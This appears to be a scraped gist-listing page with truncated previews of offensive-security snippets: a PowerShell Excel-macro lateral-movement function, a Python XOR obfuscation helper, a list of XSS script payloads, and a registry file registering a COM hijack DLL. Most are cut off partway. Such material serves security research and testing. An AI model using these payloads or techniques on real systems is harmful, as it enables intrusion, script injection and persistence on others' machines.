This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function Invoke-ExcelMacroPivot{ | |
<# | |
.AUTHOR | |
Matt Nelson (@enigma0x3) | |
.SYNOPSIS | |
Pivots to a remote host by using an Excel macro and Excel's COM object | |
.PARAMETER Target | |
Remote host to pivot to | |
.PARAMETER RemoteDocumentPath | |
Local path on the remote host where the payload resides |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# | |
# NB : this is not secure | |
# from http://code.activestate.com/recipes/266586-simple-xor-keyword-encryption/ | |
# added base64 encoding for simple querystring :) | |
# | |
def xor_crypt_string(data, key='awesomepassword', encode=False, decode=False): | |
from itertools import izip, cycle | |
import base64 | |
if decode: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
''"> | |
”><script>alert(“X”)</script> | |
’><script>alert(1)</script> | |
"><script>alert(1)</script> | |
'><script>alert(1)</script> | |
' '><script>alert(1)</script> | |
"><script>alert(1)</script> | |
'><script>alert(1)</script> | |
<script>alert(1)</script> | |
"><script>alert(1)</script> |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Windows Registry Editor Version 5.00 | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}] | |
[HKEY_CURRENT_USER\Software\Classes\CLSID\{97d47d56-3777-49fb-8e8f-90d7e30e1a1e}\InProcServer32] | |
@="C:\\Users\\Administrator\\Documents\\Visual Studio 2015\\Projects\\ClassLibrary2\\ClassLibrary2\\bin\\x86\\Debug\\ClassLibrary2.dll" |